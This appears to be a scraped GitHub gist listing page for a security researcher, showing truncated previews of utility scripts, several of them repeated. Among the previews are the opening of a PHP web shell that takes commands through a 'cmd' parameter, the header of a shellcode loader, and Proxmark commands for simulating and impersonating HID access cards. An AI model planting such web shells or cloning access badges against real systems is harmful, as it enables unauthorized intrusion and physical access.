Joshua Wright joswr1ght

## summarizelinks.js
// Useful JavaScript to make a simple table of links from an open page using the browser Inspector console.
// https://www.datablist.com/learn/scraping/extract-urls-from-webpage

var x = document.querySelectorAll("a");
var myarray = []
for (var i=0; i<x.length; i++){
var nametext = x[i].textContent;
var cleantext = nametext.replace(/\s+/g, ' ').trim();
var cleanlink = x[i].href;
myarray.push([cleantext,cleanlink]);

## InstallUtil-ShellCode.cs
/*
Author: Casey Smith, Twitter: @subTee
License: BSD 3-Clause

Minor cleanup and clarity changes by Joshua Wright <josh@wr1ght.net> @joswr1ght
*/
using System;
using System.Net;
using System.Diagnostics;
using System.Reflection;

## extract-tlsscan-hostnames.py
#!/usr/bin/env python3
# Mark Baggett @MarkBaggett graciously wrote this script.
# Minor changes by Joshua Wright @joswr1ght.
# Use it to retrieve host name information from the JSON output of tls-scan
# (https://github.com/prbinu/tls-scan) in the subjectCN and subjectAltName
# fields.

import json
import re
import sys

## easy-simple-php-webshell.php
<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
    if(isset($_GET['cmd']))
    {

## getios10beta1kernelcache.sh
# Get decrypted kernelcache
# URL for iOS 10 Beta 1 for iPhone 6s taken from http://pastebin.com/FRMfanmT
wget -q http://apple.co/28R9rhS -O ios10beta1-iphone6s.zip
mkdir ios10beta1
unzip -q ios10beta1-iphone6s.zip -d ios10beta1
cd ios10beta1
wget -q http://nah6.com/%7Eitsme/cvs-xdadevtools/iphone/tools/lzssdec.cpp
g++ -o lzssdec lzssdec.cpp
./lzssdec -o 439 < AssetData/boot/kernelcache.release.n71 >kernelcache.decrypted # 439 is offset byte count to 0xFFCFFAEDFE header
xxd kernelcache.decrypted | head -1

## hid-proxmark-cheat-sheet.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              5 stars
            
          
                joswr1ght
                / hid-proxmark-cheat-sheet.md
            
            
              Last active
              March 18, 2024 15:22
            
          
    HID/ProxCard Cheat Sheet

Joshua Wright | josh@willhackforsushi.com | DRAFT/Work-in-Progress


Proxmark3 Iceman Edition Command
Function


lf hid read
Read from a nearby HID/ProxCard card


wiegand list
Display a list of supported Wiegand data formats used by HID cards


lf hid sim -r 2006ec0c86
Simulate a HID/ProxCard with the Wiegand value 2006ec0c86; supply the appropriate Wiegand value for the card you wish to impersonate


lf hid sim -w H10301 --fc 118 --cn 16612
Simulate the card number 16612 with facility code 118 using the H10301 (26-bit HID) format (same as the command above but specifying the FC and CN explicitly)


## Copy-RemoteWindowsEventLogs.ps1
# https://chat.openai.com/share/6d96527b-288d-45a9-8eb4-e8b43d52486a
# Input parameters
param (
    [Parameter(Mandatory=$true)]
    [string]$inputFile,

    [Parameter(Mandatory=$true)]
    [System.Management.Automation.PSCredential]$Credential
)

## stopresponderattacks.cmd
REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad"
REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad" /v "WpadOverride" /t REG_DWORD /d "1" /f


REG ADD  "HKLM\Software\policies\Microsoft\Windows NT\DNSClient"
REG ADD  "HKLM\Software\policies\Microsoft\Windows NT\DNSClient" /v "EnableMulticast" /t REG_DWORD /d "0" /f

## nltk-patch.py
# NLTK makes the assumption that users are online when importing the library.
# This is partly to automate the download or corpus files and other aassets,
# but if those files already exist then offline mode is problematic. `import nltk`
# will still work, but it takes a while to timeout, producing errors:
#
# [nltk_data] Error loading averaged_perceptron_tagger: <urlopen error
# [nltk_data]     [Errno -3] Temporary failure in name resolution>
# [nltk_data] Error loading punkt: <urlopen error [Errno -3] Temporary
# [nltk_data]     failure in name resolution>
# [nltk_data] Error loading stopwords: <urlopen error [Errno -3]

## wifiscan.cmd
FOR /L %N IN () DO @netsh wlan show networks mode=bssid | findstr "^SSID Signal" && ping -n 16 127.0.0.1 >NUL && cls
	// Useful JavaScript to make a simple table of links from an open page using the browser Inspector console.
	// https://www.datablist.com/learn/scraping/extract-urls-from-webpage

	var x = document.querySelectorAll("a");
	var myarray = []
	for (var i=0; i<x.length; i++){
	var nametext = x[i].textContent;
	var cleantext = nametext.replace(/\s+/g, ' ').trim();
	var cleanlink = x[i].href;
	myarray.push([cleantext,cleanlink]);
	/*
	Author: Casey Smith, Twitter: @subTee
	License: BSD 3-Clause

	Minor cleanup and clarity changes by Joshua Wright <josh@wr1ght.net> @joswr1ght
	*/
	using System;
	using System.Net;
	using System.Diagnostics;
	using System.Reflection;
	#!/usr/bin/env python3
	# Mark Baggett @MarkBaggett graciously wrote this script.
	# Minor changes by Joshua Wright @joswr1ght.
	# Use it to retrieve host name information from the JSON output of tls-scan
	# (https://github.com/prbinu/tls-scan) in the subjectCN and subjectAltName
	# fields.

	import json
	import re
	import sys
	<html>
	<body>
	<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
	<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
	<input type="SUBMIT" value="Execute">
	</form>
	<pre>
	<?php
	if(isset($_GET['cmd']))
	{
	# Get decrypted kernelcache
	# URL for iOS 10 Beta 1 for iPhone 6s taken from http://pastebin.com/FRMfanmT
	wget -q http://apple.co/28R9rhS -O ios10beta1-iphone6s.zip
	mkdir ios10beta1
	unzip -q ios10beta1-iphone6s.zip -d ios10beta1
	cd ios10beta1
	wget -q http://nah6.com/%7Eitsme/cvs-xdadevtools/iphone/tools/lzssdec.cpp
	g++ -o lzssdec lzssdec.cpp
	./lzssdec -o 439 < AssetData/boot/kernelcache.release.n71 >kernelcache.decrypted # 439 is offset byte count to 0xFFCFFAEDFE header
	xxd kernelcache.decrypted \| head -1
Proxmark3 Iceman Edition Command	Function
`lf hid read`	Read from a nearby HID/ProxCard card
`wiegand list`	Display a list of supported Wiegand data formats used by HID cards
`lf hid sim -r 2006ec0c86`	Simulate a HID/ProxCard with the Wiegand value 2006ec0c86; supply the appropriate Wiegand value for the card you wish to impersonate
`lf hid sim -w H10301 --fc 118 --cn 16612`	Simulate the card number 16612 with facility code 118 using the H10301 (26-bit HID) format (same as the command above but specifying the FC and CN explicitly)
	# https://chat.openai.com/share/6d96527b-288d-45a9-8eb4-e8b43d52486a
	# Input parameters
	param (
	[Parameter(Mandatory=$true)]
	[string]$inputFile,

	[Parameter(Mandatory=$true)]
	[System.Management.Automation.PSCredential]$Credential
	)
	REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad"
	REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad" /v "WpadOverride" /t REG_DWORD /d "1" /f


	REG ADD "HKLM\Software\policies\Microsoft\Windows NT\DNSClient"
	REG ADD "HKLM\Software\policies\Microsoft\Windows NT\DNSClient" /v "EnableMulticast" /t REG_DWORD /d "0" /f
	# NLTK makes the assumption that users are online when importing the library.
	# This is partly to automate the download or corpus files and other aassets,
	# but if those files already exist then offline mode is problematic. `import nltk`
	# will still work, but it takes a while to timeout, producing errors:
	#
	# [nltk_data] Error loading averaged_perceptron_tagger: <urlopen error
	# [nltk_data] [Errno -3] Temporary failure in name resolution>
	# [nltk_data] Error loading punkt: <urlopen error [Errno -3] Temporary
	# [nltk_data] failure in name resolution>
	# [nltk_data] Error loading stopwords: <urlopen error [Errno -3]